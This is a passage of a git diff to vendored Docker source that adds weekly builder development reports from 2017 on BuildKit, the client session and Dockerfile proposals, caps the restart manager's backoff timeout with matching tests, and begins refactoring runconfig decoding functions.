+ +### New feature: Long running session + +PR for [adding long-running session between daemon and cli](https://github.com/moby/moby/pull/32677) that enables advanced features like incremental context send, build credentials from the client, ssh forwarding etc. + +@simonferquel proposed a [grpc-only version of that interface](https://github.com/moby/moby/pull/33047) that should simplify the setup needed for describing new features for the session. Looking for design reviews. + +The feature also needs to be reworked after CLI split. + +### buildkit + +Not much progress [apart from some design discussion](https://github.com/moby/moby/issues/32925). Next step would be to open up a repo. + +### Proposals for new Dockerfile features that need design feedback: + +[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100) + +[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487) + +[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507) + +[DAG image builder](https://github.com/moby/moby/issues/32550) + +[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new) + +[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new) + +If you are interested in implementing any of them, leave a comment on the specific issues. + +### Other new builder features currently in code-review: + +[Allow builds from any git remote ref](https://github.com/moby/moby/pull/32502) + +[Fix a case where using FROM scratch as NAME would fail](https://github.com/moby/moby/pull/32997) + +### Backlog: + +[Build secrets](https://github.com/moby/moby/pull/30637) will be brought up again in next maintainer's meeting to evaluate how to move on with this, if any other proposals have changed the objective and if we should wait for swarm secrets to be available first. 
diff --git a/vendor/github.com/docker/docker/reports/builder/2017-05-15.md b/vendor/github.com/docker/docker/reports/builder/2017-05-15.md new file mode 100644 index 0000000000..cfc742f3aa --- /dev/null +++ b/vendor/github.com/docker/docker/reports/builder/2017-05-15.md @@ -0,0 +1,64 @@ +# Development Report for May 15, 2017 + +### Multi-stage builds fixes coming in 17.06-rc1 + +Some bugs were discovered in new multi-stage build feature, release in 17.05. + +When using an image name directly in `COPY --from` without defining a build stage, the data associated with that image was not properly cleaned up. + +If a second was based on `scratch` image, the metadata from the previous stage didn't get reset, forcing the user to clear it manually with extra commands. + +Fixes for these are merged for the next release, everyone is welcomed to test it once `17.06-rc1` is out. + +- [Fix resetting image metadata between stages for scratch case](https://github.com/moby/moby/pull/33179) +- [Fix releasing implicit mounts](https://github.com/moby/moby/pull/33090) +- [Fix a case where using FROM scratch as NAME would fail](https://github.com/moby/moby/pull/32997) + + +### Quality: Dependency interface switch + +Work continues on making the builder dependency interface more stable. This week methods for getting access to source image were swapped out to a new version that keeps a reference to image data until build job has complete. 
+ +Merged as part of this effort: + +- [Expose GetImage interface for builder](https://github.com/moby/moby/pull/33054) + +In review: +- [Refactor builder probe cache and container backend](https://github.com/moby/moby/pull/33061) +- [Refactor COPY/ADD dispatchers](https://github.com/moby/moby/pull/33116) + + +### New feature: Long running session + +PR for [adding long-running session between daemon and cli](https://github.com/moby/moby/pull/32677) that enables advanced features like incremental context send, build credentials from the client, ssh forwarding etc. + +@simonferquel updated a [grpc-only version of that interface](https://github.com/moby/moby/pull/33047) and mostly seems that consensus was achieved for using only grpc transport. @tonistiigi finished up persistent cache layer and garbage collection for file transfers. The PR now needs to be split up because CLI has moved. Once that is done, the main PR should be ready for review early this week. + +### Merged: Specifying any remote ref in git checkout URLs + +Building from git sources now allows [specifying any remote ref](https://github.com/moby/moby/pull/32502). For example, to build a pull request from GitHub you can use: `docker build git://github.com/moby/moby#pull/32502/head`. + + +### Proposals for new Dockerfile features that need design feedback: + +[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100) + +[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487) + +[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507) + +[DAG image builder](https://github.com/moby/moby/issues/32550) + +[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new) + +[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new) + +If you are interested in implementing any of them, leave a comment on the specific issues. 
+ +### Other new builder features currently in code-review: + +- + +### Backlog: + +[Build secrets](https://github.com/moby/moby/pull/30637) will be brought up again in next maintainer's meeting to evaluate how to move on with this, if any other proposals have changed the objective and if we should wait for swarm secrets to be available first. diff --git a/vendor/github.com/docker/docker/reports/builder/2017-05-22.md b/vendor/github.com/docker/docker/reports/builder/2017-05-22.md new file mode 100644 index 0000000000..29ecc6bb9a --- /dev/null +++ b/vendor/github.com/docker/docker/reports/builder/2017-05-22.md @@ -0,0 +1,47 @@ +# Development Report for May 22, 2017 + +### New feature: Long running session + +PR for [adding long-running session between daemon and cli](https://github.com/moby/moby/pull/32677) that enables advanced features like incremental context send, build credentials from the client, ssh forwarding etc. is ready for reviews. This is blocking many new features like token signing, not pulling unnecessary context files, exposing sources outside working directory etc. + + +### Quality: Dependency interface switch + +Work continues on making the builder dependency interface more stable. + +Merged as part of this effort this week: + +- [Refactor COPY/ADD dispatchers](https://github.com/moby/moby/pull/33116) + +In review: +- [Refactor builder probe cache and container backend](https://github.com/moby/moby/pull/33061) + +### Buildkit + +[Diff and snapshot services](https://github.com/containerd/containerd/pull/849) were added to containerd. This is a required dependency for [buildkit](https://github.com/moby/moby/issues/32925). + +### Proposals discussed in maintainers meeting + +New builder proposals were discussed in maintainers meeting. 
The decision was to give 2 more weeks for anyone to post feedback to [IMPORT/EXPORT commands](https://github.com/moby/moby/issues/32100) and [`RUN --mount`](https://github.com/moby/moby/issues/32507) and accept them for development if nothing significant comes up. + +Build secrets and its possible overlap with [--mount](https://github.com/moby/moby/issues/32507) was discussed as well. The decision was to create a [new issue](https://github.com/moby/moby/issues/33343)(as the [old PR](https://github.com/moby/moby/pull/30637) is closed) to track this and avoid it from blocking `--mount` implementation. + +### Proposals for new Dockerfile features that need design feedback: + +[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100) + +[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487) + +[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507) + +[DAG image builder](https://github.com/moby/moby/issues/32550) + +[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new) + +[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new) + +If you are interested in implementing any of them, leave a comment on the specific issues. + +### Other new builder features currently in code-review: + +- diff --git a/vendor/github.com/docker/docker/reports/builder/2017-05-29.md b/vendor/github.com/docker/docker/reports/builder/2017-05-29.md new file mode 100644 index 0000000000..33043d9f3b --- /dev/null +++ b/vendor/github.com/docker/docker/reports/builder/2017-05-29.md @@ -0,0 +1,52 @@ +# Development Report for May 29, 2017 + +### New feature: Long running session + +PR for [adding long-running session between daemon and cli](https://github.com/moby/moby/pull/32677) that enables advanced features like incremental context send, build credentials from the client, ssh forwarding, etc. is ready for reviews. 
It is blocking many new features like the token signing, not pulling unnecessary context files, exposing sources outside working directory, etc. Maintainers are encouraged to give this one a review! + + +### Quality: Dependency interface switch + +Work continues on making the builder dependency interface more stable. + +Merged as part of this effort this week: + +- [Refactor builder probe cache and container backend](https://github.com/moby/moby/pull/33061) + +@dnephin continues working on the copy/export aspects of the interface. + +### Buildkit + +Some initial proof of concept code for [buildkit](https://github.com/moby/moby/issues/32925) has been pushed to https://github.com/tonistiigi/buildkit_poc . It's in a very early exploratory stage. Current development has been about providing concurrent references based access to the snapshot data that is backed by containerd. More info should follow in next weeks, including hopefully opening up an official repo. If you have questions or want to help, stop by the issues section of that repo or the proposal in moby/moby. + +### Proposals discussed in maintainers meeting + +Reminder from last week: New builder proposals were discussed in maintainers meeting. The decision was to give 2 more weeks for anyone to post feedback to [IMPORT/EXPORT commands](https://github.com/moby/moby/issues/32100) and [`RUN --mount`](https://github.com/moby/moby/issues/32507) and accept them for development if nothing significant comes up. + +New issue about [build secrets](https://github.com/moby/moby/issues/33343) has not got much traction. If you want this feature to become a reality please make yourself heard. 
+ +### Proposals for new Dockerfile features that need design feedback: + +[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100) + +[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487) + +[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507) + +[DAG image builder](https://github.com/moby/moby/issues/32550) + +[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new) + +[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new) + +If you are interested in implementing any of them, leave a comment on the specific issues. + +### Other new builder features currently in code-review: + +[Fix canceling builder on chunked requests](https://github.com/moby/moby/pull/33363) + +[Fix parser directive refactoring](https://github.com/moby/moby/pull/33436) + +[Warn/deprecate continuing on empty lines in `Dockerfile`](https://github.com/moby/moby/pull/29161) + +[Fix behavior of absolute paths in .dockerignore](https://github.com/moby/moby/pull/32088) \ No newline at end of file diff --git a/vendor/github.com/docker/docker/reports/builder/2017-06-05.md b/vendor/github.com/docker/docker/reports/builder/2017-06-05.md new file mode 100644 index 0000000000..3746c2639e --- /dev/null +++ b/vendor/github.com/docker/docker/reports/builder/2017-06-05.md @@ -0,0 +1,58 @@ +# Development Report for June 5, 2017 + +### New feature: Long running session + +Similarly to last week, the PR for [adding long-running session between daemon and cli](https://github.com/moby/moby/pull/32677) is waiting for reviews. It is blocking many new features like the token signing, not pulling unnecessary context files, exposing sources outside working directory, etc. Maintainers are encouraged to give this one a review so it can be included in `v17.07` release. 
+ + +### Quality: Dependency interface switch + +Work continues on making the builder dependency interface more stable. + +PRs currently in review as part of this effort: + +- [Move file copying from the daemon to the builder](https://github.com/moby/moby/pull/33454) + +This PR is the core of the update that removes the need to track active containers and instead of lets builder hold references to layers while it's running. + +Related to this, @simonferquel opened a [WIP PR](https://github.com/moby/moby/pull/33492) that introduces typed Dockerfile parsing. This enables making [decisions about dependencies](https://github.com/moby/moby/issues/32550#issuecomment-297867334) between build stages and reusing Dockerfile parsing as a buildkit frontend. + +### Buildkit + +Some initial proof of concept code for [buildkit](https://github.com/moby/moby/issues/32925) has been pushed to https://github.com/tonistiigi/buildkit_poc . It's in a very early exploratory stage. Current codebase includes libraries for getting concurrency safe references to containerd snapshots using a centralized cache management instance. There is a sample source implementation for pulling images to these snapshots and executing jobs with runc on top of them. There is also some utility code for concurrent execution and progress stream handling. More info should follow in next weeks, including hopefully opening up an official repo. If you have questions or want to help, stop by the issues section of that repo or the proposal in moby/moby. + +### Proposals discussed in maintainers meeting + +Reminder from last week: New builder proposals were discussed in maintainers meeting. The decision was to give two more weeks for anyone to post feedback to [IMPORT/EXPORT commands](https://github.com/moby/moby/issues/32100) and [`RUN --mount`](https://github.com/moby/moby/issues/32507) and accept them for development if nothing significant comes up. 
It is the last week to post your feedback on these proposals or the comments in them. You can also volunteer to implement them. + +A new issue about [build secrets](https://github.com/moby/moby/issues/33343) has not got much traction. If you want this feature to become a reality, please make yourself heard. + +### Proposals for new Dockerfile features that need design feedback: + +[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100) + +[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487) + +[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507) + +[DAG image builder](https://github.com/moby/moby/issues/32550) + +[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new) + +[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new) + +[Provide advanced .dockerignore use-cases](https://github.com/moby/moby/issues/12886) [2](https://github.com/moby/moby/issues/12886#issuecomment-306247989) + +If you are interested in implementing any of them, leave a comment on the specific issues. 
+ +### Other builder PRs merged last week + +[Fix canceling builder on chunked requests](https://github.com/moby/moby/pull/33363) + +[Fix parser directive refactoring](https://github.com/moby/moby/pull/33436) + +### Builder features currently in code-review: + +[Warn/deprecate continuing on empty lines in `Dockerfile`](https://github.com/moby/moby/pull/29161) + +[Fix behavior of absolute paths in .dockerignore](https://github.com/moby/moby/pull/32088) \ No newline at end of file diff --git a/vendor/github.com/docker/docker/reports/builder/2017-06-12.md b/vendor/github.com/docker/docker/reports/builder/2017-06-12.md new file mode 100644 index 0000000000..df5d801e76 --- /dev/null +++ b/vendor/github.com/docker/docker/reports/builder/2017-06-12.md @@ -0,0 +1,58 @@ +# Development Report for June 12, 2017 + + +### Buildkit + +[Proposal](https://github.com/moby/moby/issues/32925) + +More updates to the [POC repo](https://github.com/tonistiigi/buildkit_poc). It now contains binaries for the daemon and client. Examples directory shows a way for invoking a build job by generating the internal low-level build graph definition with a helper binary(as there is not support for frontends yet). The grpc control server binary can be built in two versions, one that connects to containerD socket and other that doesn't have any external dependencies. + +If you have questions or want to help, stop by the issues section of that repo or the proposal in moby/moby. + +### Typed Dockerfile parsing + +[PR](https://github.com/moby/moby/pull/33492) + +New PR that enables parsing Dockerfiles into typed structures so they can be preprocessed to eliminate unnecessary build stages and reused with different kinds of dispatchers. + +### Long running session & incremental file sending + +[PR ](https://github.com/moby/moby/pull/32677) + +Same status as last week. The PR went through one pass of review from @dnephin and has been rebased again. 
Maintainers are encouraged to give this one a review so it can be included in `v17.07` release. + + +### Quality: Dependency interface switch + +[Move file copying from the daemon to the builder](https://github.com/moby/moby/pull/33454) PR is waiting for a second review. + +### Proposals for new Dockerfile features that need design feedback: + +[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100) + +[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487) + +[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507) + +[DAG image builder](https://github.com/moby/moby/issues/32550) + +[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new) + +[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new) + +[Provide advanced .dockeringore use-cases](https://github.com/moby/moby/issues/12886) [2](https://github.com/moby/moby/issues/12886#issuecomment-306247989) + +If you are interested in implementing any of them, leave a comment on the specific issues. + +### Other builder PRs merged last week + + +### Builder features currently in code-review: + +[Warn/deprecate continuing on empty lines in `Dockerfile`](https://github.com/moby/moby/pull/29161) + +[Fix behavior of absolute paths in .dockerignore](https://github.com/moby/moby/pull/32088) + +### Backlog + +[Build secrets](https://github.com/moby/moby/issues/33343) has not got much traction. If you want this feature to become a reality, please make yourself heard. 
\ No newline at end of file diff --git a/vendor/github.com/docker/docker/reports/builder/2017-06-26.md b/vendor/github.com/docker/docker/reports/builder/2017-06-26.md new file mode 100644 index 0000000000..e0ba95a7a5 --- /dev/null +++ b/vendor/github.com/docker/docker/reports/builder/2017-06-26.md @@ -0,0 +1,78 @@ +# Development Report for June 26, 2017 + + +### BuildKit + +[Repo](https://github.com/moby/buildkit) +[Proposal](https://github.com/moby/moby/issues/32925) + +New development repo is open at https://github.com/moby/buildkit + +The readme file provides examples how to get started. You can see an example of building BuildKit with BuildKit. + +There are lots of new issues opened as well to track the missing functionality. You are welcomed to help on any of them or discuss the design there. + +Last week most of the work was done on improving the `llb` client library for more complicated use cases and providing traces and interactive progress of executed build jobs. + +The `llb` client package is a go library that helps you to generate the build definition graph. It uses chained methods to make it easy to describe what steps need to be running. Mounts can be added to the execution steps for defining multiple inputs or outputs. To prepare the graph, you just have to call `Marshal()` on a leaf node that will generate the protobuf definition for everything required to build that node. + +### Typed Dockerfile parsing + +[PR](https://github.com/moby/moby/pull/33492) + +This PR that enables parsing Dockerfiles into typed structures so they can be preprocessed to eliminate unnecessary build stages and reused with different kinds of dispatchers(eg. BuildKit). + +The PR had some review and updates in last week. Should be ready to code review soon. + +### Merged: Long running session & incremental file sending + +[PR](https://github.com/moby/moby/pull/32677) + +Incremental context sending PR was merged and is expected to land in `v17.07`. 
+ +This experimental feature lets you skip sending the build context to the daemon on repeated builder invocations during development. Currently, this feature requires a CLI flag `--stream=true`. If this flag is used, on the first builder invocation the full build context is sent to the daemon. On a second attempt, only the changed files are transferred. + +Previous build context is saved in the build cache, and you can see how much space it takes from `docker system df`. Build cache will be automatically garbage collected and can also be manually cleared with `docker prune`. + +### Quality: Dependency interface switch + +[Move file copying from the daemon to the builder](https://github.com/moby/moby/pull/33454) PR was merged. + + +### Proposals for new Dockerfile features that need design feedback: + +[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100) + +[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487) + +[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507) + +[DAG image builder](https://github.com/moby/moby/issues/32550) + +[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new) + +[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new) + +[Provide advanced .dockerignore use-cases](https://github.com/moby/moby/issues/12886) [2](https://github.com/moby/moby/issues/12886#issuecomment-306247989) + +If you are interested in implementing any of them, leave a comment on the specific issues. 
+ +### Other builder PRs merged last week + +[Warn/deprecate continuing on empty lines in `Dockerfile`](https://github.com/moby/moby/pull/29161) + +[Fix behavior of absolute paths in .dockerignore](https://github.com/moby/moby/pull/32088) + +[fix copy —from conflict with force pull](https://github.com/moby/moby/pull/33735) + +### Builder features currently in code-review: + +[Fix handling of remote "git@" notation](https://github.com/moby/moby/pull/33696) + +[builder: Emit a BuildResult after squashing.](https://github.com/moby/moby/pull/33824) + +[Fix shallow git clone in docker-build](https://github.com/moby/moby/pull/33704) + +### Backlog + +[Build secrets](https://github.com/moby/moby/issues/33343) has not got much traction. If you want this feature to become a reality, please make yourself heard. \ No newline at end of file diff --git a/vendor/github.com/docker/docker/reports/builder/2017-07-10.md b/vendor/github.com/docker/docker/reports/builder/2017-07-10.md new file mode 100644 index 0000000000..76aeee0f1d --- /dev/null +++ b/vendor/github.com/docker/docker/reports/builder/2017-07-10.md @@ -0,0 +1,65 @@ +# Development Report for July 10, 2017 + + +### BuildKit + +[Repo](https://github.com/moby/buildkit) +[Proposal](https://github.com/moby/moby/issues/32925) + +Many new features have been added since the last report. + +The build definition solver was updated to detect the identical parts of the graph sent by different clients and synchronize their processing. This is important when multiple targets of the same project are built at the same time and removes any duplication of work. + +Running build jobs now has support for graceful canceling and clear error reporting in case some build steps fail or are canceled. Bugs that may have left state dir in an inconsistent state of server shutdown were fixed. + +`buildctl du` command now shows all the information about allocated and in-use snapshots. It also shows the total space used and total reclaimable space. 
All snapshots are now persistent, and state is not lost with server restarts. + +New metadata package was implemented that other packages can use to add persistent and searchable metadata to individual snapshots. First users of that feature are the content blobs mapping on pull, size cache for `du` and instruction cache. There is also a new debug command `buildctl debug dump-metadata` to inspect what data is being stored. + +The first version of instruction cache was implemented. This caching scheme has many benefits compared to the current `docker build` caching as it doesn't require all data to be locally available to determine the cache match. The interface for the cache implementation is much simpler and could be implemented remotely as it only needs to store the cache keys and doesn't need to understand or compare their values. Content-based caching will be implemented on top of this work later. + +Separate source implementation for git repositories is currently in review. Using this source for accessing source code in git repositories has many performance and caching advantages. All the build jobs using the same git remote will use a shared local repository where updates will be pulled. All the nodes based on a git source will be cached using the commit ID of the current checkout. + +Next areas to be worked on will be implementing first exporters for getting access to the build artifacts and porting over the client session/incremental-send feature from `17.07-ce`. + +### Typed Dockerfile parsing + +[PR](https://github.com/moby/moby/pull/33492) + +The PR is in code review and waiting for feedback. Hopefully ready to be merged this week. + +### Quality: Dependency interface switch + +No updates for this week. Metadata commands need to be updated but it is probably easier to do it after https://github.com/moby/moby/pull/33492 has been merged. 
+ +### Proposals for new Dockerfile features that need design feedback: + +[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100) + +[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487) + +[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507) + +[DAG image builder](https://github.com/moby/moby/issues/32550) + +[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new) + +[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new) + +[Provide advanced .dockeringore use-cases](https://github.com/moby/moby/issues/12886) [2](https://github.com/moby/moby/issues/12886#issuecomment-306247989) + +New: [RFC: Distributed BuildKit](https://github.com/moby/buildkit/issues/62) + +If you are interested in implementing any of them, leave a comment on the specific issues. + +### Other builder PRs merged last week + +[build: fix add from remote url](https://github.com/moby/moby/pull/33851) + +### Builder features currently in code-review: + +[Fix shallow git clone in docker-build](https://github.com/moby/moby/pull/33704) + +### Backlog + +[Build secrets](https://github.com/moby/moby/issues/33343) has not got much traction. If you want this feature to become a reality, please make yourself heard. 
\ No newline at end of file diff --git a/vendor/github.com/docker/docker/reports/builder/2017-07-17.md b/vendor/github.com/docker/docker/reports/builder/2017-07-17.md new file mode 100644 index 0000000000..96cc8d1849 --- /dev/null +++ b/vendor/github.com/docker/docker/reports/builder/2017-07-17.md @@ -0,0 +1,79 @@ +# Development Report for July 17, 2017 + + +### BuildKit + +[Repo](https://github.com/moby/buildkit) +[Proposal](https://github.com/moby/moby/issues/32925) + +Following features were added last week: + +#### Git source + +Source code from git repositories can now be accessed directly, similarly for images can be accessed, without the need to execute `git clone`. This has many performance and caching advantages. It accesses the remote repository using shallow fetches to only pull the required data and a uses a shared bare repository for intermediate cache between build invocations. The instruction cache for the git source is based on a commit hash and not string arguments. This means that you can always be sure that you are building the correct source and that you never build the same source twice. + +#### Containerd exporter + +Exporters are used for getting build artifacts out of buildkit. The first exporter that was implemented allows exposing the image to containerd so it can be run and pushed with `ctr` tool. `buildctl` has `--exporter` flag for specifying the exporter and `--exporter-opt` for custom values passed to the exporter. In the case of image exporter an image name can be specified. + +For example: + +``` +go run ./examples/buildkit2/buildkit.go | buildctl build --exporter image --exporter-opt name=docker.io/moby/buildkit:dev +``` + +Accessing from ctr/dist: + +``` +ctr --namespace buildkit images ls +ctr --namespace buildkit rootfs unpack +ctr --namespace buildkit run -t docker.io/moby/buildkit:dev id ash +``` + +#### Local source + +Buildkit now supports building from local sources. 
Snapshot of the local source files is created similarly to `docker build` build context. The implementation is based on the [incremental context send](https://github.com/moby/moby/pull/32677) feature in `docker-v17.07`. To use in `buildctl` the source definition needs to define a name for local endpoint, and `buildctl build` command provides a mapping from this name to a local directory with a `--local` flag. + +``` +go run ./examples/buildkit3/buildkit.go --local | buildctl build --local buildkit-src=. +``` + +### Typed Dockerfile parsing + +[PR](https://github.com/moby/moby/pull/33492) + +Didn't manage to merge this PR yet. Still in code-review. + + +### Feedback for `RUN --mount` / `COPY --chown` + +There was some new discussion around [`RUN --mount`](https://github.com/moby/moby/issues/32507) or [`COPY --chown`](https://github.com/moby/moby/issues/30110) feature. Currently, it seems that it may be best to try the shared cache capabilities described in `RUN --mount` in https://github.com/moby/buildkit first(it already supports the generic mounting capabilities). So to unblock the people waiting only on the file owner change features it may make sense to implement `COPY --chown` first. Another related candidate for `v17.08` release is https://github.com/moby/moby/issues/32816. 
+ + +### Proposals for new Dockerfile features that need design feedback: + +[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100) + +[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487) + +[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507) + +[DAG image builder](https://github.com/moby/moby/issues/32550) + +[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new) + +[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new) + +[Provide advanced .dockeringore use-cases](https://github.com/moby/moby/issues/12886) [2](https://github.com/moby/moby/issues/12886#issuecomment-306247989) + +New: [RFC: Distributed BuildKit](https://github.com/moby/buildkit/issues/62) + +If you are interested in implementing any of them, leave a comment on the specific issues. + +### Builder features currently in code-review: + +[Fix shallow git clone in docker-build](https://github.com/moby/moby/pull/33704) + +### Backlog + +[Build secrets](https://github.com/moby/moby/issues/33343) has not got much traction. If you want this feature to become a reality, please make yourself heard. 
\ No newline at end of file diff --git a/vendor/github.com/docker/docker/restartmanager/restartmanager.go b/vendor/github.com/docker/docker/restartmanager/restartmanager.go index 570fc93802..6468ccf7e6 100644 --- a/vendor/github.com/docker/docker/restartmanager/restartmanager.go +++ b/vendor/github.com/docker/docker/restartmanager/restartmanager.go @@ -1,4 +1,4 @@ -package restartmanager +package restartmanager // import "github.com/docker/docker/restartmanager" import ( "errors" @@ -12,6 +12,7 @@ import ( const ( backoffMultiplier = 2 defaultTimeout = 100 * time.Millisecond + maxRestartTimeout = 1 * time.Minute ) // ErrRestartCanceled is returned when the restart manager has been @@ -35,7 +36,7 @@ type restartManager struct { canceled bool } -// New returns a new restartmanager based on a policy. +// New returns a new restartManager based on a policy. func New(policy container.RestartPolicy, restartCount int) RestartManager { return &restartManager{policy: policy, restartCount: restartCount, cancel: make(chan struct{})} } @@ -63,18 +64,22 @@ func (rm *restartManager) ShouldRestart(exitCode uint32, hasBeenManuallyStopped } if rm.active { - return false, nil, fmt.Errorf("invalid call on active restartmanager") + return false, nil, fmt.Errorf("invalid call on an active restart manager") } // if the container ran for more than 10s, regardless of status and policy reset the // the timeout back to the default. 
if executionDuration.Seconds() >= 10 { rm.timeout = 0 } - if rm.timeout == 0 { + switch { + case rm.timeout == 0: rm.timeout = defaultTimeout - } else { + case rm.timeout < maxRestartTimeout: rm.timeout *= backoffMultiplier } + if rm.timeout > maxRestartTimeout { + rm.timeout = maxRestartTimeout + } var restart bool switch { diff --git a/vendor/github.com/docker/docker/restartmanager/restartmanager_test.go b/vendor/github.com/docker/docker/restartmanager/restartmanager_test.go index 20eced54d3..4b6f302479 100644 --- a/vendor/github.com/docker/docker/restartmanager/restartmanager_test.go +++ b/vendor/github.com/docker/docker/restartmanager/restartmanager_test.go @@ -1,4 +1,4 @@ -package restartmanager +package restartmanager // import "github.com/docker/docker/restartmanager" import ( "testing" @@ -9,26 +9,28 @@ import ( func TestRestartManagerTimeout(t *testing.T) { rm := New(container.RestartPolicy{Name: "always"}, 0).(*restartManager) - should, _, err := rm.ShouldRestart(0, false, 1*time.Second) + var duration = time.Duration(1 * time.Second) + should, _, err := rm.ShouldRestart(0, false, duration) if err != nil { t.Fatal(err) } if !should { t.Fatal("container should be restarted") } - if rm.timeout != 100*time.Millisecond { - t.Fatalf("restart manager should have a timeout of 100ms but has %s", rm.timeout) + if rm.timeout != defaultTimeout { + t.Fatalf("restart manager should have a timeout of 100 ms but has %s", rm.timeout) } } func TestRestartManagerTimeoutReset(t *testing.T) { rm := New(container.RestartPolicy{Name: "always"}, 0).(*restartManager) rm.timeout = 5 * time.Second - _, _, err := rm.ShouldRestart(0, false, 10*time.Second) + var duration = time.Duration(10 * time.Second) + _, _, err := rm.ShouldRestart(0, false, duration) if err != nil { t.Fatal(err) } - if rm.timeout != 100*time.Millisecond { - t.Fatalf("restart manager should have a timeout of 100ms but has %s", rm.timeout) + if rm.timeout != defaultTimeout { + t.Fatalf("restart manager should 
have a timeout of 100 ms but has %s", rm.timeout) } } diff --git a/vendor/github.com/docker/docker/runconfig/config.go b/vendor/github.com/docker/docker/runconfig/config.go index 508681cfe0..cbacf47df3 100644 --- a/vendor/github.com/docker/docker/runconfig/config.go +++ b/vendor/github.com/docker/docker/runconfig/config.go @@ -1,14 +1,12 @@ -package runconfig +package runconfig // import "github.com/docker/docker/runconfig" import ( "encoding/json" - "fmt" "io" "github.com/docker/docker/api/types/container" networktypes "github.com/docker/docker/api/types/network" "github.com/docker/docker/pkg/sysinfo" - "github.com/docker/docker/volume" ) // ContainerDecoder implements httputils.ContainerDecoder @@ -17,19 +15,19 @@ type ContainerDecoder struct{} // DecodeConfig makes ContainerDecoder to implement httputils.ContainerDecoder func (r ContainerDecoder) DecodeConfig(src io.Reader) (*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) { - return DecodeContainerConfig(src) + return decodeContainerConfig(src) } // DecodeHostConfig makes ContainerDecoder to implement httputils.ContainerDecoder func (r ContainerDecoder) DecodeHostConfig(src io.Reader) (*container.HostConfig, error) { - return DecodeHostConfig(src) + return decodeHostConfig(src) } -// DecodeContainerConfig decodes a json encoded config into a ContainerConfigWrapper +// decodeContainerConfig decodes a json encoded config into a ContainerConfigWrapper // struct and returns both a Config and a HostConfig struct // Be aware this function is not checking whether the resulted structs are nil, // it's your business to do so -func DecodeContainerConfig(src io.Reader) (*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) { +func decodeContainerConfig(src io.Reader) (*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) { var w ContainerConfigWrapper decoder := json.NewDecoder(src) @@ -46,52 +44,38 @@ func DecodeContainerConfig(src 
io.Reader) (*container.Config, *container.HostCon if w.Config.Volumes == nil { w.Config.Volumes = make(map[string]struct{}) } - - // Now validate all the volumes and binds - if err := validateMountSettings(w.Config, hc); err != nil { - return nil, nil, nil, err - } } // Certain parameters need daemon-side validation that cannot be done // on the client, as only the daemon knows what is valid for the platform. - if err := ValidateNetMode(w.Config, hc); err != nil { + if err := validateNetMode(w.Config, hc); err != nil { return nil, nil, nil, err } // Validate isolation - if err := ValidateIsolation(hc); err != nil { + if err := validateIsolation(hc); err != nil { return nil, nil, nil, err } // Validate QoS - if err := ValidateQoS(hc); err != nil { + if err := validateQoS(hc); err != nil { return nil, nil, nil, err } // Validate Resources - if err := ValidateResources(hc, sysinfo.New(true)); err != nil { + if err := validateResources(hc, sysinfo.New(true)); err != nil { return nil, nil, nil, err } - return w.Config, hc, w.NetworkingConfig, nil -} - -// validateMountSettings validates each of the volumes and bind settings -// passed by the caller to ensure they are valid. -func validateMountSettings(c *container.Config, hc *container.HostConfig) error { - // it is ok to have len(hc.Mounts) > 0 && (len(hc.Binds) > 0 || len (c.Volumes) > 0 || len (hc.Tmpfs) > 0 ) - // Ensure all volumes and binds are valid. 
